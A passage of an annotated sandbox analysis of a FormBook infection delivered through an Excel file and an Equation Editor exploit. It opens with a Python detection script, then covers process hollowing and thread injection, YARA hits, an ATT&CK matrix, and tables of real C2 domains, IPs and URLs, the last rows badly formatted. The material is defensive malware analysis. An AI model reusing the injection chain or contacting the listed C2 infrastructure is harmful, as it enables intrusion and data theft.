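            if src == "eqnedt32.exe":         # Equation Editor spawning anything = exploitation
                emit("equation_editor_child", f"{src} -> {child}")
            if ev.image.lower().startswith("c:\\users\\public\\"):
                emit("exec_from_users_public", ev.image)
            if child == "cmd.exe" and re.search(r"/c\s+del\b", ev.cmdline, re.IGNORECASE):
                emit("self_del_via_cmd", f"{src}: {ev.cmdline}")
        elif ev.kind == "Domain query":
            domains[src].add(ev.rest)
        elif ev.kind == "Network Connect":
            connects[src].add(ev.rest)
    for proc in sorted(SYSTEM_PROCESSES):
        d, c = domains.get(proc, set()), connects.get(proc, set())
        if d or c:
            emit("system_process_network", f"{proc}: {len(d)} domains, {len(c)} connects")
    for proc, names in domains.items():       # FormBook-style rotation through many hosts
        if len(names) >= rotation_threshold:
            emit("c2_domain_rotation", f"{proc}: {len(names)} distinct domains")
    return alerts


SAMPLE_LINES = [  # copied from the report; network lines are a subset
    r"Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding",
    r"Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'",
    r"Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'",
    r"Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe",
    r"Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'",
    r"Source: C:\Windows\explorer.exeDomain query: www.thunderoffroadresort.com",
    r"Source: C:\Windows\explorer.exeDomain query: www.18598853855.com",
    r"Source: C:\Windows\explorer.exeDomain query: www.stone-master.info",
    r"Source: C:\Windows\explorer.exeNetwork Connect: 144.76.242.196 80",
    r"Source: C:\Windows\explorer.exeDomain query: www.qcmax.com",
    r"Source: C:\Windows\explorer.exeDomain query: www.thesixteenthround.net",
    r"Source: C:\Windows\explorer.exeDomain query: www.christlicheliebe.net",
    r"Source: C:\Windows\explorer.exeNetwork Connect: 104.128.125.95 80",
    r"Source: C:\Windows\explorer.exeNetwork Connect: 18.166.77.19 80",
    r"Source: C:\Windows\explorer.exeDomain query: www.hostvngiare.com",
    r"Source: C:\Windows\explorer.exeDomain query: www.starr2021.com",
    r"Source: C:\Windows\explorer.exeDomain query: www.playfulpainters.com",
]

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_LINES):
        print(f"{rule:24s} {evidence}")
```

The Equation Editor rule mirrors the report's own "Office equation editor starts processes" signature and the Sigma "EQNEDT32.EXE" detections in the signature list: in a Sysmon or EDR feed the same condition is ParentImage ending in EQNEDT32.EXE with any child. The rotation rule is what separates FormBook's decoy-domain walk from a single compromised host; the threshold is a choice for this example, not a value from the report.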
Contains functionality to prevent local Windows debugging
Source: C:\Users\Public\vbc.exe; Code function: 4_2_72341000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write (reported twice)
Source: C:\Windows\SysWOW64\help.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe; Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\help.exe; Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe; Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe; Section unmapped: C:\Windows\SysWOW64\help.exe base address: B00000
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe; Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\help.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
(Taken together this is FormBook's usual injection pattern: the second vbc.exe instance maps RWX sections into explorer.exe and resumes execution there via an APC and SetThreadContext; the code in explorer.exe starts a legitimate SysWOW64 binary, help.exe, whose image is unmapped at its base 0xB00000 and replaced with the payload; the hollowed help.exe then writes back into explorer.exe and finally deletes the dropper with cmd.exe. The RDTSC and DebugPort checks listed above run inside help.exe as well, because it carries the same unpacked image.)
Source: explorer.exe, 00000006.00000002.2373565413.00000000006F0000.00000002.00000001.sdmp; Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.2373565413.00000000006F0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2373354532.00000000001F5000.00000004.00000020.sdmp; Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.2373565413.00000000006F0000.00000002.00000001.sdmp; Binary or memory string: !Progman
(Program Manager, Progman and Shell_TrayWnd are explorer.exe's own window titles and classes; their presence in its memory is expected and is not evidence by itself.)

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; File source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
(The FormBook payload is thus present in the first vbc.exe (process 4, unpacked stage at 0x2E30000), in the second vbc.exe (process 5, image base 0x400000 plus regions 0x290000 and 0x840000) and in the hollowed help.exe (process 7, regions 0x80000, 0x160000 and 0x1E0000).)

Remote Access Functionality:

Yara detected FormBook
Source: Yara match; the same fourteen match sources as listed under Stealing of Sensitive Information above.

Mitre Att&ck Matrix

Entries carrying a trailing number were matched by signatures in this analysis (the digits are the report's match counters); the unnumbered entries are the matrix template. Listed by tactic:

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Native API 1, Shared Modules 1, Exploitation for Client Execution 13, At (Windows), Cron, Launchd, Scheduled Task
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
Privilege Escalation: Process Injection 612, Extra Window Memory Injection 1, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
Defense Evasion: Masquerading 111, Virtualization/Sandbox Evasion 2, Process Injection 612, Deobfuscate/Decode Files or Information 1, Obfuscated Files or Information 31, Software Packing 11, Extra Window Memory Injection 1
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: Query Registry 1, Security Software Discovery 231, Virtualization/Sandbox Evasion 2, Process Discovery 2, Remote System Discovery 1, File and Directory Discovery 2, System Information Discovery 13
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Archive Collected Data 1, Clipboard Data 1, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel 12, Ingress Tool Transfer 14, Non-Application Layer Protocol 3, Application Layer Protocol 124, Fallback Channels, Multiband Communication, Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: System Shutdown/Reboot 1, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact

Behavior Graph

Graph ID: 385368; Sample: Bank Details.xlsx; Start date: 12/04/2021; Architecture: WINDOWS; Score: 100
(Legend of the original graph: process, signature, created file, DNS/IP info, is dropped, is Windows process, number of created registry values, number of created files, implementation language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), is malicious, Internet.)

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

Process tree as drawn in the graph:
EXCEL.EXE (started; node counters 174 and 49, created files and registry values per the legend)
EQNEDT32.EXE (started; node counter 16)
  DNS/IP: stdypmrimelimtewsosq.dns.army 103.141.138.117 (ports 49170, 80), VNPT-AS-VN VIETNAMPOSTSANDTELECOMMUNICATIONSGROUP, VN, Viet Nam; fqe.short.gy 52.59.165.42 (ports 443, 49167), AMAZON-02, US, United States
  Dropped: C:\Users\user\AppData\Local\...\winlog[1].exe (PE32); C:\Users\Public\vbc.exe (PE32)
  Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  vbc.exe (started; node counter 18)
    Dropped: C:\Users\user\AppData\Local\...\e4utfxiuc.dll (PE32)
    Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; 2 other signatures
    vbc.exe (started)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe (injected)
        DNS/IP: www.christlicheliebe.net 144.76.242.196 (ports 49175, 80), HETZNER-AS, DE, Germany; www.qcmax.com 104.128.125.95 (ports 49174, 80), HENGTONG-IDC-LLC, US, United States; 12 other IPs or domains
        Signature: System process connects to network (likely due to code injection or exploit)
        help.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe (started)

(The graph makes the download stage explicit: EQNEDT32.EXE, not Excel, contacted fqe.short.gy over 443 and stdypmrimelimtewsosq.dns.army over 80 and wrote winlog[1].exe to the WinINet cache, i.e. the Equation Editor exploit's shellcode fetched the payload, saved it as C:\Users\Public\vbc.exe and executed it. Everything after that point is FormBook's own loader and injection chain.)

          Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | 16% | Metadefender | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | 76% | ReversingLabs | Win32.Trojan.Predator
C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll | 19% | Metadefender | -
C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll | 38% | ReversingLabs | Win32.Trojan.Predator
C:\Users\Public\vbc.exe | 16% | Metadefender | -
C:\Users\Public\vbc.exe | 76% | ReversingLabs | Win32.Trojan.Predator

winlog[1].exe (the file EQNEDT32.EXE downloaded into the IE cache) and C:\Users\Public\vbc.exe have identical detection rates and labels, consistent with vbc.exe being the downloaded file copied to its execution location. The nsv1FD2.tmp directory name follows the NSIS installer's temporary-directory convention, which points to vbc.exe being an NSIS-packaged dropper that unpacks e4utfxiuc.dll at run time; the hollowed second vbc.exe instance in the behavior graph is where the FormBook payload surfaces.

Unpacked PE Files

Source | Detection | Scanner | Label
5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.help.exe.1027960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
4.2.vbc.exe.72340000.16.unpack | 100% | Avira | HEUR/AGEN.1131513
4.2.vbc.exe.2e30000.15.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.help.exe.44c4c0.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.mercadolivre.com.br/ | 0% | URL Reputation (3 results) | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation (3 results) | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation (3 results) | safe
http://www.mozilla.com0 | 0% | URL Reputation (3 results) | safe
http://www.starr2021.com/aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T | 0% | Avira URL Cloud | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation (3 results) | safe
http://%s.com | 0% | URL Reputation (3 results) | safe
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation (3 results) | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation (3 results) | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation (3 results) | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation (3 results) | safe
http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation (3 results) | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation (3 results) | safe
http://buscar.ozu.es/ | 0% | Avira URL Cloud | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation (3 results) | safe
http://search.auction.co.kr/ | 0% | URL Reputation (3 results) | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation (3 results) | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation (3 results) | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation (3 results) | safe
http://google.pchome.com.tw/ | 0% | URL Reputation (3 results) | safe
http://www.ozu.es/favicon.ico | 0% | Avira URL Cloud | safe
http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation (3 results) | safe
http://www.gmarket.co.kr/ | 0% | URL Reputation (3 results) | safe
http://searchresults.news.com.au/ | 0% | URL Reputation (3 results) | safe
http://www.asharqalawsat.com/ | 0% | URL Reputation (3 results) | safe
http://search.yahoo.co.jp | 0% | URL Reputation (3 results) | safe
http://buscador.terra.es/ | 0% | URL Reputation (3 results) | safe
http://search.orange.co.uk/favicon.ico | 0% | URL Reputation (3 results) | safe
http://www.iask.com/ | 0% | URL Reputation (3 results) | safe
http://cgi.search.biglobe.ne.jp/ | 0% | Avira URL Cloud | safe
http://search.ipop.co.kr/favicon.ico | 0% | URL Reputation (3 results) | safe
http://p.zhongsou.com/favicon.ico | 0% | Avira URL Cloud | safe
http://service2.bfast.com/ | 0% | URL Reputation (3 results) | safe
http://www.%s.comPA | 0% | URL Reputation (3 results) | safe
http://www.news.com.au/favicon.ico | 0% | URL Reputation (3 results) | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.hostvngiare.com | 104.21.71.76 | true | true | - | unknown
stdypmrimelimtewsosq.dns.army | 103.141.138.117 | true | true | - | unknown
dns.95h5cdn.com | 18.166.77.19 | true | true | - | unknown
gp-usea-elb-13pj8i7f0fbsh-1771787045.us-east-1.elb.amazonaws.com | 3.230.51.235 | true | false | - | high
parkingpage.namecheap.com | 198.54.117.212 | true | false | - | high
playfulpainters.com | 34.102.136.180 | true | false | - | unknown
www.qcmax.com | 104.128.125.95 | true | true | - | unknown
fqe.short.gy | 52.59.165.42 | true | false | - | unknown
www.christlicheliebe.net | 144.76.242.196 | true | true | - | unknown
www.thunderoffroadresort.com | unknown | unknown | true | - | unknown
www.18598853855.com | unknown | unknown | true | - | unknown
www.starr2021.com | unknown | unknown | true | - | unknown
www.stone-master.info | unknown | unknown | true | - | unknown
www.playfulpainters.com | unknown | unknown | true | - | unknown
www.thesixteenthround.net | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.starr2021.com/aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T | true | Avira URL Cloud: safe | unknown

Note the disagreement in this row: the behavior analysis marks the URL malicious, while the Avira URL Cloud lookup returns "safe" and the reputation is unknown. A reputation feed should not be used to clear a URL that dynamic analysis has tied to post-injection traffic; treat the verdict from the observed behavior as authoritative and the feed result as merely "not yet listed".

URLs from Memory and Binaries

All of the URLs in this table were carved from the memory of explorer.exe, the process the sample injected into; none of them appears in the Contacted URLs or Contacted Domains tables above, and the report marks each as not malicious. They are the search-provider and favicon strings normally resident in that process, not indicators from the sample, and should not be added to a blocklist. Unless a row states otherwise, the source is explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp.

Name | Malicious | Antivirus Detection | Reputation
http://search.chol.com/favicon.ico | false | - | high
http://www.mercadolivre.com.br/ | false | URL Reputation: safe (3 results) | unknown
http://www.merlin.com.pl/favicon.ico | false | URL Reputation: safe (3 results) | unknown
http://search.ebay.de/ | false | - | high
http://www.mtv.com/ | false | - | high
http://www.rambler.ru/ | false | - | high
http://www.nifty.com/favicon.ico | false | - | high
http://www.dailymail.co.uk/ | false | URL Reputation: safe (3 results) | unknown
http://www3.fnac.com/favicon.ico | false | - | high
http://buscar.ya.com/ | false | - | high
http://search.yahoo.com/favicon.ico | false | - | high
http://www.mozilla.com0 (source: explorer.exe, 00000006.00000000.2208077400.000000000B149000.00000004.00000001.sdmp) | false | URL Reputation: safe (3 results) | unknown
http://www.sogou.com/favicon.ico | false | - | high
http://asp.usatoday.com/ | false | - | high
http://fr.search.yahoo.com/ | false | - | high
http://rover.ebay.com | false | - | high
http://in.search.yahoo.com/ | false | - | high
http://img.shopzilla.com/shopzilla/shopzilla.ico | false | - | high
http://search.ebay.in/ | false | - | high
http://image.excite.co.jp/jp/favicon/lep.ico | false | URL Reputation: safe (3 results) | unknown
http://%s.com (source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmp) | false | URL Reputation: safe (3 results) | low
http://msk.afisha.ru/ | false | - | high
http://busca.igbusca.com.br//app/static/images/favicon.ico | false | URL Reputation: safe (3 results) | unknown
http://search.rediff.com/ | false | - | high
http://www.windows.com/pctv. (source: explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp) | false | - | high
http://www.ya.com/favicon.ico | false | - | high
http://www.etmall.com.tw/favicon.ico | false | URL Reputation: safe (3 results) | unknown
http://it.search.dada.net/favicon.ico | false | URL Reputation: safe (3 results) | unknown
http://search.naver.com/ | false | - | high
http://www.google.ru/ | false | - | high
http://search.hanafos.com/favicon.ico | false | URL Reputation: safe (3 results) | unknown
http://cgi.search.biglobe.ne.jp/favicon.ico | false | Avira URL Cloud: safe | unknown
http://www.abril.com.br/favicon.ico | false | URL Reputation: safe (3 results) | unknown
http://search.daum.net/ | false | - | high
http://search.naver.com/favicon.ico | false | - | high
http://search.msn.co.jp/results.aspx?q= | false | URL Reputation: safe (3 results) | unknown
http://www.clarin.com/favicon.ico | false | - | high
http://buscar.ozu.es/ | false | Avira URL Cloud: safe | unknown
http://kr.search.yahoo.com/ | false | - | high
http://search.about.com/ | false | - | high
http://busca.igbusca.com.br/ | false | URL Reputation: safe (3 results) | unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity | false | - | high
http://www.ask.com/ | false | - | high
http://www.priceminister.com/favicon.ico | false | - | high
http://www.cjmall.com/ | false | - | high
http://search.centrum.cz/ | false | - | high
http://suche.t-online.de/ | false | - | high
http://www.google.it/ | false | - | high
http://search.auction.co.kr/ | false | URL Reputation: safe (3 results) | unknown
http://www.ceneo.pl/ | false | - | high
http://www.amazon.de/ | false | - | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv (source: explorer.exe, 00000006.00000000.2203542912.000000000861C000.00000004.00000001.sdmp) | false | - | high
http://sads.myspace.com/ | false | - | high
http://busca.buscape.com.br/favicon.ico | false | URL Reputation: safe (3 results) | unknown
http://www.pchome.com.tw/favicon.ico | false | URL Reputation: safe (3 results) | unknown
http://browse.guardian.co.uk/favicon.ico | false | URL Reputation: safe (3 results) | unknown
http://google.pchome.com.tw/ | false | URL Reputation: safe (3 results) | unknown
http://list.taobao.com/browse/search_visual.htm?n=15&amp;q= | false | - | high
http://www.rambler.ru/favicon.ico | false | - | high
http://uk.search.yahoo.com/ | false | - | high
http://espanol.search.yahoo.com/ | false | - | high
http://www.ozu.es/favicon.ico | false | Avira URL Cloud: safe | unknown
http://search.sify.com/ | false | - | high
http://openimage.interpark.com/interpark.ico | false | - | high
                                                                                                                              http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://search.ebay.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://search.nifty.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.google.si/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.google.cz/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.soso.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.univision.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.ebay.it/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://busca.orange.es/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.target.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.iask.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.tesco.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://search.interpark.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://investor.msn.com/vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://search.espn.go.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://service2.bfast.com/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.%s.comPAvbc.exe, 00000004.00000002.2185288938.00000000020D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2184022473.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      low
                                                                                                                                                                      http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
